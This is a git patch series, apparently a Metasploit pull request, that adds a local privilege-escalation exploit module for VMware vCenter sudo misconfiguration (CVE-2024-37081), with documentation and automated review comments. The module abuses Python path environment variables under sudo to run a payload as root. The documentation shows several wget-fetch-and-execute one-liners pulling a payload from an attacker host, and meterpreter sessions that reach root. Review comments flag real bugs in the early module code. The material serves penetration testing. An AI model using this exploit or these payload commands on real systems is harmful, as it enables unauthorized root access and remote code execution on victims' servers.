From c8084e4504b2a5d7375373fd2ebb5698509bf022 Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 19 Aug 2024 20:02:05 -0400 Subject: [PATCH 1/7] Create vcenter_sudo_lpe.rb --- .../exploits/linux/local/vcenter_sudo_lpe.rb | 148 ++++++++++++++++++ 1 file changed, 148 insertions(+) create mode 100644 modules/exploits/linux/local/vcenter_sudo_lpe.rb diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb new file mode 100644 index 000000000000..dd6a4515c891 --- /dev/null +++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb 
@@ -0,0 +1,148 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Post::Linux::Priv + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Post::Vcenter + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'vCenter Sudo Privilege Escalation', + 'Description' => %q{ + VMware vCenter Server < 7.0.3 update R and < 8.0.2 update D + contains multiple local privilege escalation vulnerabilities + due to misconfiguration of sudo. An authenticated local user + with non-administrative privileges may exploit these issues + to elevate privileges to root on vCenter Server Appliance. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'h00die', # msf module + 'Matei "Mal" Badanoiu', # discovery + ], + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [ + [ 'Auto', {} ], + ], + 'Privileged' => true, + 'References' => [ + [ 'URL', 'https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453'], + [ 'URL', 'https://github.com/mbadanoiu/CVE-2024-37081/blob/main/VMware%20vCenter%20-%20CVE-2024-37081.pdf'], + [ 'CVE', '2024-37081'] + ], + 'DisclosureDate' => '2024-06-18', + 'DefaultTarget' => 0, + # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html + 'Notes' => { + 'Stability' => [], + 'Reliability' => [], + 'SideEffects' => [] + } + ) + ) + # force exploit is used to bypass the check command results + register_advanced_options [ + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ] + end + + # Simplify pulling the writable directory 
variable + def base_dir + datastore['WritableDir'].to_s + end + + def check + vbuild = get_vcenter_build # VMware VirtualCenter 7.0.3 build-19480866 + # we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS + # technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead + return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build-(\d+)/ =~ vbuild + vbuild_version = Rex::Version.new("#{Regexp.last_match(0)}.#{Regexp.last_match(1)}") + + return CheckCode::Safe("Version not vulnerable: #{vbuild}") + unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d + (vbuild_version > Rex::Version.new('7.0.0')&& vbuild_version < Rex::Version.new('7.0.3.24026615')) || # 7.0 u3r + + vprint_good("Exploitable version detected: #{vbuild_version}") + + user = cmd_exec('whoami').chomp + groups = cmd_exec('groups').split(' ').chomp + if ['infraprofile', 'vpxd', 'sts', 'pod'].contains? user || + ['operator', 'admin'] & group + vprint_good("User is vulnerable") + else + return CheckCode::Safe("User not vulnerable or not in correct group. 
(#{user}:#{groups})") + end + + CheckCode::Appears("System seems exploitable") + end + + def exploit_operator_group + # for this exploit we abuse get_user_password_status.py as it does a 'import spwd', so if we + # modify the PYTHONPATH and set our payload to spwd.py, we'll get arbitrary execution + vprint_status("Utilizing PYTHONPATH exploitation method for operator group.") + vuln_exe = '/usr/lib/applmgmt/support/scripts/get_user_password_status.py' + + return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file?vuln_exe + + # Upload payload executable + payload_path = "#{base_dir}/spwd.py" + upload_and_chmodx payload_path, generate_payload_exe + register_files_for_cleanup(payload_path) + timeout = 30 + print_status 'Launching exploit...' + output = cmd_exec "echo 'PYTHONPATH=#{base_dir} sudo #{vuln_exe} & exit' | #{executable_path}", nil, timeout + output.each_line { |line| vprint_status line.chomp } + end + + def exploit_pod_user + # for this exploit we abuse install-parametery as it does a 'from appliance...', so if we + # modify the VMWARE_PYTHON_PATH and set our payload to __init__.py, we'll get arbitrary execution + vprint_status("Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.") + mkdir("#{base_dir}/appliance") + payload_path = "#{base_dir}/__init__.py" + upload_and_chmodx payload_path, generate_payload_exe + register_files_for_cleanup(payload_path) + timeout = 30 + print_status 'Launching exploit...' 
+ output = cmd_exec "echo 'VMWARE_PYTHON_PATH=#{base_dir} sudo install-parameter & exit' | #{executable_path}", nil, timeout + output.each_line { |line| vprint_status line.chomp } + end + + def exploit_admin_group + # for this exploit we abuse /bin/dcli, a bash script, as it executes $VMWARE_PYTHON_BIN + # so we modify the VMWARE_PYTHON_BIN, and we'll get arbitrary execution + vprint_status("Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.") + mkdir("#{base_dir}/appliance") + payload_path = "#{base_dir}/__init__.py" + upload_and_chmodx payload_path, generate_payload_exe + register_files_for_cleanup(payload_path) + timeout = 30 + print_status 'Launching exploit...' + output = cmd_exec "echo 'VMWARE_PYTHON_BIN=#{payload_path} sudo /bin/dcli & exit' | #{executable_path}", nil, timeout + output.each_line { |line| vprint_status line.chomp } + end + + def exploit + user = cmd_exec('whoami').chomp + groups = cmd_exec('groups').split(' ').chomp + if user == 'pod' + exploit_pod_user + elsif group.contains? 'operator' + exploit_operator_group + elsif group.contains? 'admin' + exploit_admin_group + end + end +end From 5d2bc4aa3c785b263164147881767c7532b0128e Mon Sep 17 00:00:00 2001 From: h00die Date: Sun, 3 Nov 2024 14:47:40 -0500 Subject: [PATCH 2/7] add vcenter server appliance to ssh platform --- lib/metasploit/framework/ssh/platform.rb | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/lib/metasploit/framework/ssh/platform.rb b/lib/metasploit/framework/ssh/platform.rb index 6d016f27ee9c..1a4001c88eec 100644 --- a/lib/metasploit/framework/ssh/platform.rb +++ b/lib/metasploit/framework/ssh/platform.rb 
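Review bot: In `check`, the version gate is split across two statements: `return CheckCode::Safe("Version not vulnerable: #{vbuild}")` ends its line and the `unless (vbuild_version > ...` modifier starts on the next one, so the `return` is unconditional and `check` can never get past the version test (the dangling `||` on the last condition line is also a syntax error on its own); the modifier has to sit on the same line as the `return`, or the condition should be bound to a local first. The `Notes` hash declares `Stability`, `Reliability` and `SideEffects` as empty arrays although every `exploit_*` method uploads a payload under `WritableDir`, so at minimum `'SideEffects' => [ARTIFACTS_ON_DISK]` is warranted; the stability and reliability values I cannot judge from the code alone. Both findings are in the single hunk that creates the module, so no definition is cut by the hunk edge.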
@@ -73,6 +73,14 @@ def self.get_platform_info(ssh_socket, timeout: 10) # esxi 6.7 elsif info =~ /sh: id: not found/ info = ssh_socket.exec!("vmware -v\n").to_s + # vcenter 6.7 (photon) + elsif info =~ /Unknown command: `id'/ + info = ssh_socket.exec!("api com.vmware.appliance.version1.system.version.get\n\n").to_s + /Product:\s+(?.+)$/ =~ info + /Version:\s+(?[\d\.]+)$/ =~ info + if version && product + info = "#{product.strip} #{version.strip}" + end else info << ssh_socket.exec!("help\n?\n\n\n").to_s end @@ -113,6 +121,8 @@ def self.get_platform_from_info(info) 'mikrotik' when /Arista/i 'arista' + when /VMware vCenter Server Appliance/i + 'vcenter' else 'unknown' end From 773355f0e8f8db0ade851334717325683bbc439f Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 4 Nov 2024 16:26:08 -0500 Subject: [PATCH 3/7] making bcenter lpe progress --- lib/metasploit/framework/ssh/platform.rb | 3 +++ .../exploits/linux/local/vcenter_sudo_lpe.rb | 20 +++++++++---------- 2 files changed, 12 insertions(+), 11 deletions(-) diff --git a/lib/metasploit/framework/ssh/platform.rb b/lib/metasploit/framework/ssh/platform.rb index 1a4001c88eec..f0c38ca4d4ff 100644 --- a/lib/metasploit/framework/ssh/platform.rb +++ b/lib/metasploit/framework/ssh/platform.rb @@ -75,6 +75,9 @@ def self.get_platform_info(ssh_socket, timeout: 10) info = ssh_socket.exec!("vmware -v\n").to_s # vcenter 6.7 (photon) elsif info =~ /Unknown command: `id'/ + # VMware VirtualCenter 6.7.0 build-19299595 + # eventually we'll want to try to shell in via 'shell'. On failure you see: "User 'user_operator' is not authorized to run this command" + # on succeess: "Shell access is granted to " info = ssh_socket.exec!("api com.vmware.appliance.version1.system.version.get\n\n").to_s /Product:\s+(?.+)$/ =~ info /Version:\s+(?[\d\.]+)$/ =~ info diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb index dd6a4515c891..46279eef7ea2 100644 
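Review bot: The two regexes in the new vCenter branch read `/Product:\s+(?.+)$/` and `/Version:\s+(?[\d\.]+)$/` as rendered here, which is not valid Ruby and would leave `product` and `version` undefined; if the capture names were stripped by the page rendering, the source should be `/Product:\s+(?<product>.+)$/` and `/Version:\s+(?<version>[\d\.]+)$/`, otherwise this is a real syntax error that breaks SSH platform detection for every target, not just vCenter. Separately, this branch replaces `info` with the `api` output rather than appending to it as the `else` branch does with `info << ...`, so when the Product/Version lines do not match, the banner that selected this branch is no longer available to `get_platform_from_info`. `get_platform_info` starts and ends outside the hunk.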
--- a/modules/exploits/linux/local/vcenter_sudo_lpe.rb +++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper - include Msf::Post::Vcenter + include Msf::Post::Vcenter::Vcenter prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) 
@@ -68,18 +68,16 @@ def check # we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS # technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build-(\d+)/ =~ vbuild - vbuild_version = Rex::Version.new("#{Regexp.last_match(0)}.#{Regexp.last_match(1)}") + vbuild_version = Rex::Version.new("#{Regexp.last_match(1)}.#{Regexp.last_match(2)}") - return CheckCode::Safe("Version not vulnerable: #{vbuild}") - unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d - (vbuild_version > Rex::Version.new('7.0.0')&& vbuild_version < Rex::Version.new('7.0.3.24026615')) || # 7.0 u3r + return CheckCode::Safe("Version not vulnerable: #{vbuild}") unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d + (vbuild_version > Rex::Version.new('7.0.0')&& vbuild_version < Rex::Version.new('7.0.3.24026615')) # 7.0 u3r vprint_good("Exploitable version detected: #{vbuild_version}") - user = cmd_exec('whoami').chomp - groups = cmd_exec('groups').split(' ').chomp - if ['infraprofile', 'vpxd', 'sts', 'pod'].contains? user || - ['operator', 'admin'] & group + @user = cmd_exec('whoami').chomp + @groups = cmd_exec('groups').split(' ').chomp + if ['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any? vprint_good("User is vulnerable") else return CheckCode::Safe("User not vulnerable or not in correct group. (#{user}:#{groups})") 
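Review bot: `@groups = cmd_exec('groups').split(' ').chomp` calls `chomp` on the Array that `split` returns, which raises NoMethodError before the group test is reached; the order has to be `cmd_exec('groups').chomp.split(' ')`. The condition on the following line also still reads the bare names `user` and `group` even though this hunk just moved the values into `@user` and `@groups`, and `Array#contains?` does not exist in Ruby (`include?` does), so as committed `check` cannot return `CheckCode::Appears`; `if %w[infraprofile vpxd sts pod].include?(@user) || (%w[operator admin] & @groups).any?` is what the intent appears to be. `check` continues past the end of the hunk.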
@@ -135,8 +133,8 @@ def exploit_admin_group end def exploit - user = cmd_exec('whoami').chomp - groups = cmd_exec('groups').split(' ').chomp + @user = cmd_exec('whoami').chomp if @user.nil? + @groups = cmd_exec('groups').split(' ').chomp if @groups.nil? if user == 'pod' exploit_pod_user elsif group.contains? 'operator' From f38661d6c3739230591fddfa0de263a87244ec94 Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 18 Nov 2024 07:30:21 -0500 Subject: [PATCH 4/7] pod user working --- .../exploit/linux/local/vcenter_sudo_lpe.md | 133 ++++++++++++++++++ lib/metasploit/framework/ssh/platform.rb | 6 +- .../exploits/linux/local/vcenter_sudo_lpe.rb | 26 ++-- 3 files changed, 153 insertions(+), 12 deletions(-) create mode 100644 documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md diff --git a/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md b/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md new file mode 100644 index 000000000000..0ab8bcf61220 --- /dev/null +++ b/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md 
@@ -0,0 +1,133 @@ +## Vulnerable Application + +Instructions to get the vulnerable application. If applicable, include links to the vulnerable install +files, as well as instructions on installing/configuring the environment if it is different than a +standard install. Much of this will come from the PR, and can be copy/pasted. + +## Verification Steps +Example steps in this format (is also in the PR): + +1. Install the application +1. Start msfconsole +1. Do: `use [module path]` +1. Do: `run` +1. You should get a shell. + +## Options +List each option and how to use it. + +### Option Name + +Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here. + +## Scenarios +Specific demo of using the module that might be useful in a real world scenario. + +### VMware vCenter Server Appliance 8.0.0.10000 (VMware-VCSA-all-8.0.0-20519528.iso) + +#### `pod` user + +Start our first handler + +``` +[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery +[*] Using configured payload python/meterpreter/reverse_tcp +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set srvport 8181 +srvport => 8181 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 7 +target => 7 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. +[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] Using URL: http://2.2.2.2:8181/wS8RErnHVLh +[*] Server started. 
+[*] Run the following command on the target machine: +wget -qO 5Y0wnQU5 --no-check-certificate http://2.2.2.2:8181/wS8RErnHVLh; chmod +x 5Y0wnQU5; ./5Y0wnQU5& disown +``` + +Setup, SSH in, start a shell, allow `pod` login access, then change user and start our payload. + +``` +PS C:\Users\h00die> ssh root@1.1.1.1 + +VMware vCenter Server Appliance 8.0.0.10000 + +(root@1.1.1.1) Password: +Connected to service + + * List APIs: "help api list" + * List Plugins: "help pi list" + * Launch BASH: "shell" + +Command> api com.vmware.appliance.version1.system.version.get +Version: + Version: 8.0.0.10000 + Product: VMware vCenter Server + Build: 20519528 + Type: '' + Summary: VMware vCenter Server 8.0 + Releasedate: October 11, 2022 + Installtime: '' + +Command> shell +Shell access is granted to root +root@localhost [ ~ ]# usermod -s /bin/bash pod +/usr/sbin/usermod.bk -s /bin/bash pod +root@localhost [ ~ ]# su pod +pod@localhost [ /root ]$ cd /tmp +pod@localhost [ /tmp ]$ wget -qO smswhnVK --no-check-certificate http://2.2.2.2:8181/xLaIAPnwiuPr9; chmod +x smswhnVK; ./smswhnVK& disown +[1] 22325 +``` + +Priv Esc + +``` +[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1 +[*] Starting interaction with 1... + +(Meterpreter 1)(/tmp) > getuid +Server username: pod +(Meterpreter 1)(/tmp) > background +[*] Backgrounding session 1... 
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe +[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set session 1 +session => 1 +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set verbose true +verbose => true +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set lport 9879 +lport => 9879 +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set autocheck false +autocheck => false +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > run + +[*] Started reverse TCP handler on 2.2.2.2:9879 +[!] AutoCheck is disabled, proceeding with exploitation +[*] Utilizing VMWARE_PYTHON_PATH exploitation method for pod user. +[*] Creating directory /tmp/appliance +[*] /tmp/appliance created +[*] Writing '/tmp/appliance/9OP6wIQJl9' (250 bytes) ... +[*] Launching exploit... +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3045380 bytes) to 1.1.1.1 +[+] Deleted /tmp/appliance/9OP6wIQJl9 +[+] Deleted /tmp/appliance/__init__.py +[+] Deleted /tmp/appliance +[*] Meterpreter session 2 opened (2.2.2.2:9879 -> 1.1.1.1:34894) at 2024-11-18 07:24:13 -0500 + +(Meterpreter 2)(/tmp) > getuid +Server username: root +(Meterpreter 2)(/tmp) > background +[*] Backgrounding session 2... +[msf](Jobs:1 Agents:2) exploit(linux/local/vcenter_sudo_lpe) > sessions -i 1 +[*] Starting interaction with 1... + +(Meterpreter 1)(/tmp) > getuid +Server username: pod +``` diff --git a/lib/metasploit/framework/ssh/platform.rb b/lib/metasploit/framework/ssh/platform.rb index f0c38ca4d4ff..8d541ef7b8f6 100644 --- a/lib/metasploit/framework/ssh/platform.rb +++ b/lib/metasploit/framework/ssh/platform.rb 
@@ -74,8 +74,9 @@ def self.get_platform_info(ssh_socket, timeout: 10) elsif info =~ /sh: id: not found/ info = ssh_socket.exec!("vmware -v\n").to_s # vcenter 6.7 (photon) - elsif info =~ /Unknown command: `id'/ + # VMware vCenter Server 8.0.0.10000 # VMware VirtualCenter 6.7.0 build-19299595 + elsif info =~ /Unknown command: `id'/ # eventually we'll want to try to shell in via 'shell'. On failure you see: "User 'user_operator' is not authorized to run this command" # on succeess: "Shell access is granted to " info = ssh_socket.exec!("api com.vmware.appliance.version1.system.version.get\n\n").to_s @@ -90,7 +91,6 @@ def self.get_platform_info(ssh_socket, timeout: 10) end rescue Timeout::Error end - info end @@ -124,7 +124,7 @@ def self.get_platform_from_info(info) 'mikrotik' when /Arista/i 'arista' - when /VMware vCenter Server Appliance/i + when /VMware vCenter Server/i 'vcenter' else 'unknown' diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb index 46279eef7ea2..0e27828d8595 100644 --- a/modules/exploits/linux/local/vcenter_sudo_lpe.rb +++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb 
@@ -64,10 +64,12 @@ def base_dir end def check - vbuild = get_vcenter_build # VMware VirtualCenter 7.0.3 build-19480866 + vbuild = get_vcenter_build + # VMware VirtualCenter 7.0.3 build-19480866 + # VMware vCenter Server Appliance 6.5.0.0 Build 16197320 # we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS # technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead - return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build-(\d+)/ =~ vbuild + return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build[- ](\d+)/i =~ vbuild vbuild_version = Rex::Version.new("#{Regexp.last_match(1)}.#{Regexp.last_match(2)}") return CheckCode::Safe("Version not vulnerable: #{vbuild}") unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d @@ -76,7 +78,7 @@ def check vprint_good("Exploitable version detected: #{vbuild_version}") @user = cmd_exec('whoami').chomp - @groups = cmd_exec('groups').split(' ').chomp + @groups = cmd_exec('groups').chomp.split(' ') if ['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any? vprint_good("User is vulnerable") else 
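Review bot: The widened regex `/(\d\.\d\.\d) build[- ](\d+)/i` mis-parses the very example added in the comment above it: on `VMware vCenter Server Appliance 6.5.0.0 Build 16197320` the first position where `\d\.\d\.\d` is followed by a space and `Build` is `5.0.0`, so the major digit is dropped and `vbuild_version` becomes `5.0.0.16197320`. That still falls outside the vulnerable ranges, but a one-digit-per-component pattern also cannot match a two-digit release or a four-component build string correctly; `/(\d+(?:\.\d+)+)\s+build[- ](\d+)/i` captures the whole dotted version and keeps `Regexp.last_match(1)`/`(2)` unchanged for the rest of the method. `check` continues outside the hunk.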
@@ -109,12 +111,18 @@ def exploit_pod_user # modify the VMWARE_PYTHON_PATH and set our payload to __init__.py, we'll get arbitrary execution vprint_status("Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.") mkdir("#{base_dir}/appliance") - payload_path = "#{base_dir}/__init__.py" + + payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}" upload_and_chmodx payload_path, generate_payload_exe register_files_for_cleanup(payload_path) + + payload_stub = "#{base_dir}/appliance/__init__.py" + write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") + register_files_for_cleanup(payload_stub) + timeout = 30 print_status 'Launching exploit...' - output = cmd_exec "echo 'VMWARE_PYTHON_PATH=#{base_dir} sudo install-parameter & exit' | #{executable_path}", nil, timeout + output = cmd_exec "sudo VMWARE_PYTHON_PATH=#{base_dir} install-parameter", nil, timeout output.each_line { |line| vprint_status line.chomp } end @@ -134,12 +142,12 @@ def exploit_admin_group def exploit @user = cmd_exec('whoami').chomp if @user.nil? - @groups = cmd_exec('groups').split(' ').chomp if @groups.nil? - if user == 'pod' + @groups = cmd_exec('groups').chomp.split(' ') if @groups.nil? + if @user == 'pod' exploit_pod_user - elsif group.contains? 'operator' + elsif @group.contains? 'operator' exploit_operator_group - elsif group.contains? 'admin' + elsif @group.contains? 'admin' exploit_admin_group end end From 6bd049e3468c91aa3ef7c244084b2b18b1cd9fcd Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 18 Nov 2024 20:09:13 -0500 Subject: [PATCH 5/7] operator working --- .../exploit/linux/local/vcenter_sudo_lpe.md | 136 ++++++++++++++++++ .../exploits/linux/local/vcenter_sudo_lpe.rb | 45 ++++-- 2 files changed, 167 insertions(+), 14 deletions(-) diff --git a/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md b/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md index 0ab8bcf61220..f2b660ab7023 100644 
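Review bot: The stub written to `appliance/__init__.py` launches the payload with `os.system('#{payload_path}')`, which blocks until the payload process exits; for the default staged meterpreter that is the lifetime of the session, so `sudo VMWARE_PYTHON_PATH=... install-parameter` only returns control when `cmd_exec`'s 30 s `timeout` fires. The transcript added in this commit is consistent with that (cleanup runs after the sudo command returns) but shows no timings, so it is worth confirming. If confirmed, detaching in the stub — `os.system('#{payload_path} &')` — lets the sudo command exit promptly, at the cost of the FileDropper cleanup being able to run before the payload has been exec'd; a short `time.sleep` in the stub after the launch would bound that. `exploit_pod_user` starts above the hunk.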
--- a/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md +++ b/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md 
@@ -131,3 +131,139 @@ Server username: root (Meterpreter 1)(/tmp) > getuid Server username: pod ``` + +#### Operator Group + +If the user `mal` exists, use that. If not, follow the bellow instructions + +Make a user in the operator group: + +``` +sudo useradd -m -s /bin/bash operator1 +sudo usermod -aG users operator1 +sudo usermod -aG operator operator1 +``` + +This may be enough, but on my install which didn't complete I had to add the sudo entry manually. + +``` +visudo +``` + +Add the following at the end: + +``` +User_Alias PYTHON_USERS = operator1 +Defaults:PYTHON_USERS env_keep += "PYTHONPATH" +``` + +Start our first handler + +``` +[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery +[*] Using configured payload python/meterpreter/reverse_tcp +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set srvport 8181 +srvport => 8181 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 7 +target => 7 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] Using URL: http://2.2.2.2:8181/eEgibKL2K +[*] Server started. 
+[*] Run the following command on the target machine: +wget -qO JSlY5cPV --no-check-certificate http://2.2.2.2:8181/eEgibKL2K; chmod +x JSlY5cPV; ./JSlY5cPV& disown +[*] Sending stage (3045380 bytes) to 1.1.1.1 +[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56166) at 2024-11-18 16:27:17 -0500 +``` + +Priv Esc + +``` +[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe +[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp +[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set lport 9870 +lport => 9870 +[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set verbose true +verbose => true +[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set autocheck false +autocheck => false +[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set session 1 +session => 1 +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > run + +[*] Started reverse TCP handler on 2.2.2.2:9870 +[!] AutoCheck is disabled, proceeding with exploitation +[*] Utilizing PYTHONPATH exploitation method for operator group. +[*] Writing '/tmp/Ma5gGdnt' (250 bytes) ... +[*] Launching exploit... +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3045380 bytes) to 1.1.1.1 +[+] Deleted /tmp/Ma5gGdnt +[+] Deleted /tmp/spwd.py +[*] Meterpreter session 2 opened (2.2.2.2:9870 -> 1.1.1.1:40550) at 2024-11-18 16:27:28 -0500 + + +(Meterpreter 2)(/tmp) > +(Meterpreter 2)(/tmp) > getuid +Server username: root +(Meterpreter 2)(/tmp) > background +[*] Backgrounding session 2... +s[msf](Jobs:1 Agents:2) exploit(linux/local/vcenter_sudo_lpe) > sessions -i 1 +[*] Starting interaction with 1... + +(Meterpreter 1)(/tmp) > getuid +Server username: operator1 +``` + +#### Admin Group + +If the user `admin` exists, use that. 
If not, follow the bellow instructions + +Make a user in the operator group: + +``` +sudo useradd -m -s /bin/bash admin +sudo usermod -aG admin admin +sudo usermod -aG users admin +``` + +Start our first handler + +``` +[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery +[*] Using configured payload python/meterpreter/reverse_tcp +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set srvport 8181 +srvport => 8181 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 7 +target => 7 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] Using URL: http://2.2.2.2:8181/Hul7qG +[*] Server started. +[*] Run the following command on the target machine: +wget -qO IsMq60f5 --no-check-certificate http://2.2.2.2:8181/Hul7qG; chmod +x IsMq60f5; ./IsMq60f5& disown +[*] Sending stage (3045380 bytes) to 1.1.1.1 +[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56166) at 2024-11-18 16:27:17 -0500 +``` + +Priv Esc + +``` +``` + + +XXX to be completed \ No newline at end of file diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb index 0e27828d8595..256557673962 100644 --- a/modules/exploits/linux/local/vcenter_sudo_lpe.rb +++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb 
